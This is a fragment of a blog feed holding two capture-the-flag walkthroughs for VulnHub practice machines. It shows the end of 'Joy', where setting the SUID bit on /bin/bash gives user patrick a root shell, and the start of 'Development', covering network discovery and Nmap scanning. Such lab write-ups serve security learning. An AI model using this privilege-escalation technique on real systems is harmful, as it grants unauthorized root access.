medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Running &lt;b&gt;test&lt;/b&gt; we are asked to change permissions to a file, for instance let&#39;s make &lt;b&gt;/bin/bash&lt;/b&gt;&amp;nbsp;executable with permission SUID bit set 4777:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://www.slashroot.in/suid-and-sgid-linux-explained-examples&quot;&gt;https://www.slashroot.in/suid-and-sgid-linux-explained-examples&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhM2uteNzQk3GxiLo0gy_xbGf25ktJX5Nxo4nc6Cp0gv5yybnPLSuwy79U5JsZjj2_VG4ra8sjcnf3N8kHL9k0Us4or19qvcbWD9VjWDNCgqP1Vz4pRu1FKC0DzJ4JJZ4tjWX8Q_aEpC6Jw/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;276&quot; data-original-width=&quot;847&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhM2uteNzQk3GxiLo0gy_xbGf25ktJX5Nxo4nc6Cp0gv5yybnPLSuwy79U5JsZjj2_VG4ra8sjcnf3N8kHL9k0Us4or19qvcbWD9VjWDNCgqP1Vz4pRu1FKC0DzJ4JJZ4tjWX8Q_aEpC6Jw/s16000/screenshot.48.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Now, user patrick can run&amp;nbsp;&lt;b&gt;/bin/bash&lt;/b&gt; and get a&amp;nbsp;&lt;b&gt;root shell&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;clear: left; float: left; font-family: arial; font-size: medium; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;115&quot; data-original-width=&quot;760&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVDP4nzt28pPdhLYlNvXolvT5QsiTm25fNHdS1s8cqbkU8BfgtXkjq2FW2LXy7Z_PjzXtNS-6pjh33IUYLy1e_truc67WSfGG7drP8FuhA8zbXR18nmupYyCO6bXjczqpr5SyvRUYHw57l/s16000/screenshot.25.jpg&quot; style=&quot;text-align: left;&quot; /&gt;&lt;/span&gt;&lt;/div&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;5 - CAPTURING THE FLAG&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Reading &lt;b&gt;proof.txt&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQUXDAqPH9-uJN97VcxfQkzVQy7iMOGoCvxrehr8sBM0Rvz_yJprYjAZPbqkZ6y4i08bO3wOeYcnhjZTBfsvTkIsD3FOu4g6UfXjUjcKIxwY5Llxp_y9VRdGXbB4wVZr1663rz2V6y_3S1/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;208&quot; data-original-width=&quot;836&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQUXDAqPH9-uJN97VcxfQkzVQy7iMOGoCvxrehr8sBM0Rvz_yJprYjAZPbqkZ6y4i08bO3wOeYcnhjZTBfsvTkIsD3FOu4g6UfXjUjcKIxwY5Llxp_y9VRdGXbB4wVZr1663rz2V6y_3S1/s16000/screenshot.26.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;/div&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/1947953814412763707/posts/default/4952825075184822669'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/1947953814412763707/posts/default/4952825075184822669'/><link rel='alternate' type='text/html' href='https://www.whitelist1.com/2021/11/joy.html' title='Joy'/><author><name>Whitelist</name><uri>http://www.blogger.com/profile/11945670003912610776</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjof621gw_dR-DSMnAu3tO7L65rN73BP8L1Qd2qFZlFY2JU5AdZAdTBdzzeurhPdZRiSSAcVe_Ftxgm7B2LHw_RUQOKt1iuQ69SdD5Rxo2K-9pfzN-ImroiyXt7jLUq0V_2gS-BKzTeWBLP/s72-c/screenshot.2.jpg" height="72" width="72"/></entry><entry><id>tag:blogger.com,1999:blog-1947953814412763707.post-8898639427119010761</id><published>2021-11-12T11:20:00.064-06:00</published><updated>2021-12-17T10:56:59.913-06:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="CAPTURE THE FLAG -   VULNERABLE MACHINES"/><title type='text'>Development</title><content type='html'>&lt;div&gt;&lt;b&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;DEVELOPMENT&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Layout for this exercise:&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyAr_DmIzyjereb17NOqZXQs1cfKj0cwCHrB1eKSbF-VUM3lrUf00SKm9qb5x_oNJhihHaXMdFj6gpKdZ6_aOqGbGuKrzXgewAJfVj5L3Bn3ySJKWeW60C8G7HaWWF2e25PNJ_t0AFdc07/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;216&quot; data-original-width=&quot;630&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyAr_DmIzyjereb17NOqZXQs1cfKj0cwCHrB1eKSbF-VUM3lrUf00SKm9qb5x_oNJhihHaXMdFj6gpKdZ6_aOqGbGuKrzXgewAJfVj5L3Bn3ySJKWeW60C8G7HaWWF2e25PNJ_t0AFdc07/s16000/screenshot.49.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;1 - INTRODUCTION&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;span style=&quot;background-color: white;&quot;&gt;- The goal of this exercise is to develop a hacking process for the vulnerable machine &lt;b&gt;Development&lt;/b&gt;&lt;/span&gt;&lt;span style=&quot;background-color: white;&quot;&gt;&amp;nbsp;from the VulnHub pentesting platform.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;p style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- &lt;b&gt;Development&lt;/b&gt;&amp;nbsp;can be downloaded from here:&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://www.vulnhub.com/entry/digitalworldlocal-bravery,281/&quot;&gt;https://www.vulnhub.com/entry/digitalworldlocal-bravery,281/&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Once downloaded &lt;b&gt;Development&lt;/b&gt;&amp;nbsp;and extracted with &lt;b&gt;Vmware&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSZUkxlXqzSzJhPa6oGX5nbljCzyPAPjeNW50RpqQvf5cwdEqUyI4byHX0kWFCNkPkMDr80DEda-c42chdzfNOuaDkJ9N5Dncu94370SmRAtLo56mXVYXm9qvPUAFwe6Qj26MsNIjnM7ml/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;258&quot; data-original-width=&quot;355&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSZUkxlXqzSzJhPa6oGX5nbljCzyPAPjeNW50RpqQvf5cwdEqUyI4byHX0kWFCNkPkMDr80DEda-c42chdzfNOuaDkJ9N5Dncu94370SmRAtLo56mXVYXm9qvPUAFwe6Qj26MsNIjnM7ml/s16000/screenshot.50.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;2 - ENUMERATION&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- &lt;b&gt;netdiscover&lt;/b&gt; helps to identify &lt;b&gt;Development&lt;/b&gt;&#39;s IP 192.168.1.21:&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjH3lfekMUX0nXCYtLKID2w7rGMhQ2aMvYY62HAgahsl4ckcHhem2JmzetGUmlor-71WcrGqKWM0T8qzX9Dud-4Wecn1nyDU5Ws8dhzupLIGWfgzNppFOugY8m2gC116cUWoQTzbrsFIrS/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;72&quot; data-original-width=&quot;449&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjH3lfekMUX0nXCYtLKID2w7rGMhQ2aMvYY62HAgahsl4ckcHhem2JmzetGUmlor-71WcrGqKWM0T8qzX9Dud-4Wecn1nyDU5Ws8dhzupLIGWfgzNppFOugY8m2gC116cUWoQTzbrsFIrS/s16000/screenshot.1.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKNRTpCKW4EN98vYV9C-7N_Yi-FueR5ROy67KRSvAR-l86JHep3Sgrif1Ur1erXuH-apvA2qm-MkLd9sw12f7Aqs-Y7NOnDzeBIBoExDDa2A-_Ia8rn-sSmOC8SXmIwUUK5hXq3C0H_qiL/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;211&quot; data-original-width=&quot;816&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKNRTpCKW4EN98vYV9C-7N_Yi-FueR5ROy67KRSvAR-l86JHep3Sgrif1Ur1erXuH-apvA2qm-MkLd9sw12f7Aqs-Y7NOnDzeBIBoExDDa2A-_Ia8rn-sSmOC8SXmIwUUK5hXq3C0H_qiL/s16000/screenshot.3.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- This machine seems to have different potential solutions, however I will stick to the walkthrough that I have used to resolve it, mainly the web server at port 8080 and SSH service at port 22.&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Scanning with Nmap:&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9wyXz9Fh3QeI-smLBU4FkRkvPfaE0CXdEyk7TQ6rKdZX6V5TI0njPyK8I2o0QDnEpd8zD2Ju5aR4eRK7jrOz0FVRGHh93NIHGX7IhPun8wZ25FuLoGTMzeUFC8zyQvHrqjSlfdvJSfhxI/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;292&quot; data-original-width=&quot;441&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9wyXz9Fh3QeI-smLBU4FkRkvPfaE0CXdEyk7TQ6rKdZX6V5TI0njPyK8I2o0QDnEpd8zD2Ju5aR4eRK7jrOz0FVRGHh93NIHGX7IhPun8wZ25FuLoGTMzeUFC8zyQvHrqjSlfdvJSfhxI/s16000/screenshot.2.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Scanning deeper port 8080:&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQP-LSf3h2ivDUklckypyWVIpkrgpFMMysUCmtq4eB0Zj-QWN7NMUIRp0Fi-3cI9s1COYPq0M5wLmbz4nRhKXmxrvI7OJkuxyetVdciQQSj8b78ZMEckSFUUJcMQ-NbZHbEa_4LIBvw3ka/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;793&quot; data-original-width=&quot;1029&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQP-LSf3h2ivDUklckypyWVIpkrgpFMMysUCmtq4eB0Zj-QWN7NMUIRp0Fi-3cI9s1COYPq0M5wLmbz4nRhKXmxrvI7OJkuxyetVdciQQSj8b78ZMEckSFUUJcMQ-NbZHbEa_4LIBvw3ka/s16000/screenshot.9.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br 